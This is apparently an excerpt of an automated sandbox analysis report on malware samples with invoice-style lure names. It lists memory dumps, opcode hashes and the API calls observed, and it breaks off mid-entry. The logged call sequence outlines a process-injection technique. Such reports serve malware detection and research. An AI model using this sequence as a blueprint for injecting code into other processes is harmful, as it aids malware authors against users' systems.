                                          • Instruction Fuzzy Hash: 96128970A14219CBCB48BBF8D89966EBBF2FFC8300F518969D449A7344DF38A855C791
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 40884a00c0a67e6e851c98544947ff166b58be7911e9dbc84e2fd80b7479beba
                                          • Instruction ID: f21a77a4197beaec407f06bcf4afa983df466e1c61b24811e4c11d6149796cfc
                                          • Opcode Fuzzy Hash: 40884a00c0a67e6e851c98544947ff166b58be7911e9dbc84e2fd80b7479beba
                                          • Instruction Fuzzy Hash: 78225C75E04119DFCB14CBA8D488ABDB7B2FF88310F248556E44AAB754D734EC82CBA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015389486.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36016020124.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36016020124.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false

                                          Execution Graph

                                          Execution Coverage:20.1%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:3.5%
                                          Total number of Nodes:85
                                          Total number of Limit Nodes:6

                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472007875.0000000009170000.00000040.00000800.00020000.00000000.sdmp, Offset: 09170000, based on PE: false
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

                                          Control-flow Graph

                                          APIs
                                          • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 0A759E1B
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472588625.000000000A750000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A750000, based on PE: false
                                          Similarity
                                          • API ID: CreateProcessUser
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

                                          Control-flow Graph

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A75C258
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472588625.000000000A750000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A750000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessWrite

                                          Control-flow Graph

                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A75C9C6
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472588625.000000000A750000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A750000, based on PE: false
                                          Similarity
                                          • API ID: ContextThreadWow64

                                          Control-flow Graph

                                          APIs
                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0A75B7FE
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472588625.000000000A750000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A750000, based on PE: false
                                          Similarity
                                          • API ID: ContextThreadWow64

                                          Control-flow Graph

                                          APIs
                                          • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 0A75C737
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472588625.000000000A750000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A750000, based on PE: false
                                          Similarity
                                          • API ID: ProtectVirtual

                                          Control-flow Graph

                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0A75284B
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472588625.000000000A750000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A750000, based on PE: false
                                          Similarity
                                          • API ID: ProtectVirtual
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0A75284B
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472588625.000000000A750000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A750000, based on PE: false
                                          Similarity
                                          • API ID: ProtectVirtual
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A75BEBE
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472588625.000000000A750000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A750000, based on PE: false
                                          Similarity
                                          • API ID: AllocVirtual
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472588625.000000000A750000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A750000, based on PE: false
                                          Similarity
                                          • API ID: ResumeThread
                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A75D1ED
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472588625.000000000A750000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A750000, based on PE: false
                                          Similarity
                                          • API ID: MessagePost
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472007875.0000000009170000.00000040.00000800.00020000.00000000.sdmp, Offset: 09170000, based on PE: false
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472007875.0000000009170000.00000040.00000800.00020000.00000000.sdmp, Offset: 09170000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_9170000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d89e85dfaf47af58af8d6e130d6dfa98e1d4aa40b6d284bf751fe7bdfafd0537
                                          • Instruction ID: b834f9aef73155afdc6e49581cbde563357eec6dd15b0c7bd0c0e4bc3c1336f4
                                          • Opcode Fuzzy Hash: d89e85dfaf47af58af8d6e130d6dfa98e1d4aa40b6d284bf751fe7bdfafd0537
                                          • Instruction Fuzzy Hash: A4029E70E44219CFCB48AFB9E85869DBBB1FF88340F4149A9D88AE3350DF744C958B95
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472007875.0000000009170000.00000040.00000800.00020000.00000000.sdmp, Offset: 09170000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_9170000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cc1e1f0aacc183c01ed00d56f1be6d6ed3a14634c618ffd6cc61068e3439badf
                                          • Instruction ID: cc0eb488f97a158304eb461c5c12b4c89ab8846fffeb1ae417d083d1987f8e6d
                                          • Opcode Fuzzy Hash: cc1e1f0aacc183c01ed00d56f1be6d6ed3a14634c618ffd6cc61068e3439badf
                                          • Instruction Fuzzy Hash: 64F16B70B14229CBCB48BBF9D89966EBBB2FF88200F4189A8D445E7354DF349C55CB91
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7b8246d006c15565a560b02e638655072c0b4eeac74cbe305213de1fc48c4dd9
                                          • Instruction ID: eef7b82ac53666e1bfdfc10599c4010579481e1610d64481044da1121906332c
                                          • Opcode Fuzzy Hash: 7b8246d006c15565a560b02e638655072c0b4eeac74cbe305213de1fc48c4dd9
                                          • Instruction Fuzzy Hash: CED1D576A00615CFCB15CFACC58899DBBF6BF88314F5A8059E61AEB262C734EC41CB50
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a62b1fb3adaf53d515eda124fa2fe6af60729860c0f375c0098faeb1297605e5
                                          • Instruction ID: eac4004eccec7cb3fddb2da95cf6cade60a1648a99223d7b99591107d10b61cc
                                          • Opcode Fuzzy Hash: a62b1fb3adaf53d515eda124fa2fe6af60729860c0f375c0098faeb1297605e5
                                          • Instruction Fuzzy Hash: B9A18C31700215DFDB25DF68C858BAF7BAAFB88349F14842DEA069B294CB74DC45CB91
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472007875.0000000009170000.00000040.00000800.00020000.00000000.sdmp, Offset: 09170000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_9170000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0aad8b3add78bfbed14c632d6b9b0efd6052bcc36aa85cd0722176043735b1b5
                                          • Instruction ID: a42ab0d5995bdceee1271a0e7024f1b2eba2807b9102282ba05d1064579c21df
                                          • Opcode Fuzzy Hash: 0aad8b3add78bfbed14c632d6b9b0efd6052bcc36aa85cd0722176043735b1b5
                                          • Instruction Fuzzy Hash: 58A1B030B04316CFC705ABB9E89963A7BB2FF89200F4549A9D485D7391DF389C89CB91
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f19fe47de0f74e7b9346e3a0c250f44047ea401cb9cfa3a88c7c184cd866bdaa
                                          • Instruction ID: beb42a8e6c74d8ede7fbea921c037582b82cd8b79e333d8caa719fbef3bded63
                                          • Opcode Fuzzy Hash: f19fe47de0f74e7b9346e3a0c250f44047ea401cb9cfa3a88c7c184cd866bdaa
                                          • Instruction Fuzzy Hash: FFC1CF78201131DBD767BBB6E551B1B7B63FB8C700F108714DA4123BACAA39681ADE35
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 73a49c30337087639fbb46c6ed92a304c646e933abd0587154aacb58c397f433
                                          • Instruction ID: 2fa4f7bedebbce85279a7f339915cc95d361e5ab2ca7873c8063ee009e64a81f
                                          • Opcode Fuzzy Hash: 73a49c30337087639fbb46c6ed92a304c646e933abd0587154aacb58c397f433
                                          • Instruction Fuzzy Hash: BCA19A35614211CFC715EBF4D884B2A77BABF88304B968969DA0AC7791DB38FC41CB61
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7e66813a6912898bf0a8e77e83219dfba18e8c75053920223b8b144c34f9faed
                                          • Instruction ID: 35f688a15bc5807e03b577cd47ec21f5bf7d4ca20b3c44450a19fc9474ee1ed9
                                          • Opcode Fuzzy Hash: 7e66813a6912898bf0a8e77e83219dfba18e8c75053920223b8b144c34f9faed
                                          • Instruction Fuzzy Hash: 4741F132680219DFDB129F29D848FAE3BE6FF89308F04491DEA0997390CB39D855C791
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 507feb1581293755450e41cd913d70e5a95a659bf6d734f40d615af4ee9d46ae
                                          • Instruction ID: 676955eaf19bd2af89c8977a839fd4cf73a33c4b09de17053e62c33823928d31
                                          • Opcode Fuzzy Hash: 507feb1581293755450e41cd913d70e5a95a659bf6d734f40d615af4ee9d46ae
                                          • Instruction Fuzzy Hash: 69919F74B04109CFCB14DF6DC488AAABBB6FF89318B14816DD619EB365DB31E841CB91
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ac1297ff214709d1045009a05333a4cea49b6385776834b82cc0a68f1fb43d0c
                                          • Instruction ID: 7164ffb56f3a40d4d02a29caafe0147f8ba3ca1e9e5eac3ae7e312c2c4cfbb13
                                          • Opcode Fuzzy Hash: ac1297ff214709d1045009a05333a4cea49b6385776834b82cc0a68f1fb43d0c
                                          • Instruction Fuzzy Hash: B191B330B00219DBDB249BB9C850B6E7BB7FB84348F1484ADD60AAB395DB748C45CF61
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 83dd4eab01cb73fb85722a2d0fca3a259c4a50b375e081ad68e4b33d584821cf
                                          • Instruction ID: bcbc47eec9dd7bed662076f89202880411a9ca803cea690c214bd362d3926ea6
                                          • Opcode Fuzzy Hash: 83dd4eab01cb73fb85722a2d0fca3a259c4a50b375e081ad68e4b33d584821cf
                                          • Instruction Fuzzy Hash: 4991B330B00209DBDB249BB9C850B6E7BB7FB84348F5484ADD60AAB395DB748D45CF61
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472007875.0000000009170000.00000040.00000800.00020000.00000000.sdmp, Offset: 09170000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_9170000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0c7ae0c5fb022a1543340c23dd8f8dc43a242f52653d27d6c9e63e5a58cbf56a
                                          • Instruction ID: 5276f2c895fb5ecce4f5063cb6990a3f3a1b2e123ddde6a547f34344f76a2c6f
                                          • Opcode Fuzzy Hash: 0c7ae0c5fb022a1543340c23dd8f8dc43a242f52653d27d6c9e63e5a58cbf56a
                                          • Instruction Fuzzy Hash: 2571B170B04217CBCB44EBF9D99962EB7B6BF88204F518569D509D3388EF349C448791
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5a0ece202fd728250bc43fbd3056335970001925670d21753af0f50d9e055dab
                                          • Instruction ID: 0d476f086b4ddd054b059131fe0730557fa42ec899dbb726497b36afc06a538a
                                          • Opcode Fuzzy Hash: 5a0ece202fd728250bc43fbd3056335970001925670d21753af0f50d9e055dab
                                          • Instruction Fuzzy Hash: 6971B230B0120CDBEB289BBDD45477E76A7FB84309F20842DF6069B7DADA388C458761
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4d3c3e527d92d0e9aaf05e8bc7088894a473f43f4ddd9b914253f3d93808dd33
                                          • Instruction ID: 67fd198489162232e3c56e4e3ad32ade47b606e130d01bc06e8701717565967c
                                          • Opcode Fuzzy Hash: 4d3c3e527d92d0e9aaf05e8bc7088894a473f43f4ddd9b914253f3d93808dd33
                                          • Instruction Fuzzy Hash: A661EF303042158FDB25AB38C458B3E7AAABF89358F14842EDA06CB3A5DF35DC46C791
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9032927c881a3f4540062fafd8a0b92436a07316ba7b3f07bc327e46fa015825
                                          • Instruction ID: ef8bc68be147c322d5e2800e77c2f873da59ee7ece73102e08bee14bf605ae16
                                          • Opcode Fuzzy Hash: 9032927c881a3f4540062fafd8a0b92436a07316ba7b3f07bc327e46fa015825
                                          • Instruction Fuzzy Hash: 5F61BE30E042098FDB19DBB9D4546AEBFB6EF89304F1480AAD615EB385DA309C09CB91
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e6e0d538aaa3b368f8cad3b9e7de51c270687e6af435462a7436411d13ec86ab
                                          • Instruction ID: 41f796299027445d8405eac0580620d8853f3c0a1c7a1202c763f518167c0f62
                                          • Opcode Fuzzy Hash: e6e0d538aaa3b368f8cad3b9e7de51c270687e6af435462a7436411d13ec86ab
                                          • Instruction Fuzzy Hash: 46617E75A14216CBC704DBF5D895BAE77B6BF88204F908969D60EE3784DB38AC41CB60
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472007875.0000000009170000.00000040.00000800.00020000.00000000.sdmp, Offset: 09170000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_9170000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f82c1206d13760b77aa34bd1053b873c7ea29225b530fffe4a9ce6716c14fdee
                                          • Instruction ID: 9ceb253359652d77be412ed797e9077802b943c68b425d1995d3fa559a4fa558
                                          • Opcode Fuzzy Hash: f82c1206d13760b77aa34bd1053b873c7ea29225b530fffe4a9ce6716c14fdee
                                          • Instruction Fuzzy Hash: 8251B375B0821ACBC744FBF8DC9962FBBB5BF88210F4585A9D849E3384DE389C458791
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5b70fb352384b5c61045fbd267e7af23162796889d4cf0c316272723379b35f2
                                          • Instruction ID: 2bb7ceb8cbd7fb1579acb2392a12dfefebb91216f3d5effc59ad18b0efc839b7
                                          • Opcode Fuzzy Hash: 5b70fb352384b5c61045fbd267e7af23162796889d4cf0c316272723379b35f2
                                          • Instruction Fuzzy Hash: 2B5190317151158FDB14DF7DC888A6ABFE9EF4964834944BEE616CB2B6DB20DC028B60
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 64d0c0d29964601c4756a96b193e10e10964460efaf59696036f514cb299fced
                                          • Instruction ID: 504a996f869a52155f50318e950dcbd8b23cd9c4922adb039e5259a55b181faf
                                          • Opcode Fuzzy Hash: 64d0c0d29964601c4756a96b193e10e10964460efaf59696036f514cb299fced
                                          • Instruction Fuzzy Hash: A6513C74E10216DFCB04EBF9D894B6EB7B6BF88204F508569E509E3354DA386C01CB60
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472007875.0000000009170000.00000040.00000800.00020000.00000000.sdmp, Offset: 09170000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_9170000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1faa5e93dbd43300b3ec50a061cfb1d43b8597141387528d65c4a451e0fc4e2b
                                          • Instruction ID: e8ad2e475783f7d9127e80d6fa976fd68fc13ba0ea12f222b205fee87c7b0c4d
                                          • Opcode Fuzzy Hash: 1faa5e93dbd43300b3ec50a061cfb1d43b8597141387528d65c4a451e0fc4e2b
                                          • Instruction Fuzzy Hash: 31519D74E00349CFDB14CFA9C888B9EFBB5FF49318F14815AE809AB291D7749845CB91
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472007875.0000000009170000.00000040.00000800.00020000.00000000.sdmp, Offset: 09170000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_9170000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3d1702f28cfff85848cf15cf49d291490c4743c72c35a37acef37facb3839813
                                          • Instruction ID: 3466acebae1e320a0effb338b091f50d232377f57bf6c1f8fab5c34fc064895b
                                          • Opcode Fuzzy Hash: 3d1702f28cfff85848cf15cf49d291490c4743c72c35a37acef37facb3839813
                                          • Instruction Fuzzy Hash: 26418170B1421ACBC748BBF9E89966EBBB5FF88200F414968D545E3340DF385C5887E6
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472007875.0000000009170000.00000040.00000800.00020000.00000000.sdmp, Offset: 09170000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_9170000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b3df4eb5cc5d7ae770eb6513936cfd965d81aede09bc9bb948e5c4095c2e8a42
                                          • Instruction ID: 81a76babc3707de548451cadbf66a6c972834aad0c1d1b7fbc58cbadbc2978e4
                                          • Opcode Fuzzy Hash: b3df4eb5cc5d7ae770eb6513936cfd965d81aede09bc9bb948e5c4095c2e8a42
                                          • Instruction Fuzzy Hash: F841C77070D3819FC306A774D86912ABFF1EF82210F05899AD4C9CB292DF389859C796
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b1ac735df0ced9fb5b57b129bb21f586f223a527452b1e7b2f7afc6af80370c1
                                          • Instruction ID: 6f392c85a343499f2efe584dae7da73d865b0b0f5645482753288b476d5c9c87
                                          • Opcode Fuzzy Hash: b1ac735df0ced9fb5b57b129bb21f586f223a527452b1e7b2f7afc6af80370c1
                                          • Instruction Fuzzy Hash: 2B41CC317042049FCB159B78D854AAE7FBAEF88311F14406DEA06D7391CE35AC02CBA0
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7f77add04396e612938b1af9fe9c3b62597f913646744c3528614cc1c63ed3cc
                                          • Instruction ID: 48135930ac62f16fad5c9aa6412d11a3add06f42380f0efd7b3f700e048c6d3d
                                          • Opcode Fuzzy Hash: 7f77add04396e612938b1af9fe9c3b62597f913646744c3528614cc1c63ed3cc
                                          • Instruction Fuzzy Hash: 72D0EA328D4108CFC6807BA7FD0D5593B69BF462177C41C20E98E909A1EF7668EC8A52
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f015270272bdb8340f78ff6bc830c685469207740f605389ac776025865f8d77
                                          • Instruction ID: e1f569d44fd7a46cfb901d348f25f554344a05c5a41d076ef41b9121014d53c2
                                          • Opcode Fuzzy Hash: f015270272bdb8340f78ff6bc830c685469207740f605389ac776025865f8d77
                                          • Instruction Fuzzy Hash: D5418B756002198FDB16DF28C888AAE7BB5FF89314F1140A9EA15CB3B5C730CC55CBA1
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ea115f370a7f491f51f70d096cf42798de0dbf27bf1051713c446da6b86a6c78
                                          • Instruction ID: 8ad122369b145d72bb7d04dfed77507e7b24509824f12c05f8413d1985a62f54
                                          • Opcode Fuzzy Hash: ea115f370a7f491f51f70d096cf42798de0dbf27bf1051713c446da6b86a6c78
                                          • Instruction Fuzzy Hash: FD41D1753002159FCB159F29E814A6A7BEAFF89359F04806DFA06CB3A5CB35DC15CB60
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472007875.0000000009170000.00000040.00000800.00020000.00000000.sdmp, Offset: 09170000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_9170000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b305e16266c3bb3d3f73be321d65b59f45084f5af409c1a441286ead03bc8c59
                                          • Instruction ID: 106e7449ab22c976d9572442d3b4b1c4f42b650d4536c45f4eb6c3b9f69d7ae1
                                          • Opcode Fuzzy Hash: b305e16266c3bb3d3f73be321d65b59f45084f5af409c1a441286ead03bc8c59
                                          • Instruction Fuzzy Hash: 7B314670B483568FC301ABF4DC9862F7BB5FF88204F4589EAE449DB281DB389C0587A1
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37472007875.0000000009170000.00000040.00000800.00020000.00000000.sdmp, Offset: 09170000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_9170000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f915354255cba821c30e9da8102df11bc043adeb93dc4226d86410bbbbaa587b
                                          • Instruction ID: 2e514a91a3bd179dbd7e85223f2ddfda4434a46fdac86d07284b619054e5d87f
                                          • Opcode Fuzzy Hash: f915354255cba821c30e9da8102df11bc043adeb93dc4226d86410bbbbaa587b
                                          • Instruction Fuzzy Hash: 7A413370E10749DFDB18CFA9C884B9EFBB5BF48318F148029E819AB350D774A885CB91
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6dd7a10a41888dd7f0fc8e21049f2be2d14eee16d583574393cc62f610f22760
                                          • Instruction ID: d254dff9d73bd99162d41eea5f6684f07d0a63af5a7203f4863c167a0bd2eeca
                                          • Opcode Fuzzy Hash: 6dd7a10a41888dd7f0fc8e21049f2be2d14eee16d583574393cc62f610f22760
                                          • Instruction Fuzzy Hash: 6B31A634B0411CCBDB1D5B6DD0547AE76A7FB88708F64446EEA02BB3B4CA758C458BA1
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.37451908530.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_13f0000_SOA.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f87faebc66a5440ac2a8ff112a6216c875eea6ba4de284fce150d3c4f3a38e26
